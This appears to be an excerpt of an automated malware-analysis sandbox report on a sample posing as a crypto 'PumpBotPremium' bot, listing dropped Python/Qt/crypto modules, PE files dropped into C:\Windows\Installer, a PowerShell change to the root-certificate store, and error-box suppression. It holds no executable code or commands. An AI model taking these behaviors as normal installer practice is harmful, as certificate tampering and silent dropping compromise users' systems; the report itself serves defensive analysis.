Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_imagingft.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\qt5gui.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\msvcp140_1.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_eksblowfish.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\libssl-1_1.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\QtGui.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\concrt140.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_decimal.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\vcruntime140_1.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_bounded_integers.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_elementtree.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\libffi-7.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_cbc.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ctr.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Protocol\_scrypt.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aes.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ofb.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_sfc64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_cfb.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_ssl.pyd Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7C27.tmp Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\qt5core.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\win32crypt.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\linalg\_umath_linalg.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_pcg64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ocb.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_webp.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_SHA256.pyd Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7C87.tmp Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ecb.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_imagingcms.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Util\_strxor.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\python3.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cv2\opencv_videoio_ffmpeg490_64.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\pywintypes310.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\QtCore.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_tkinter.pyd Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7CB7.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7C27.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7C87.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7C48.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7B99.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI8554.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7BF7.tmp Jump to dropped file
Stores large binary data to the registry
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2 Blob Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
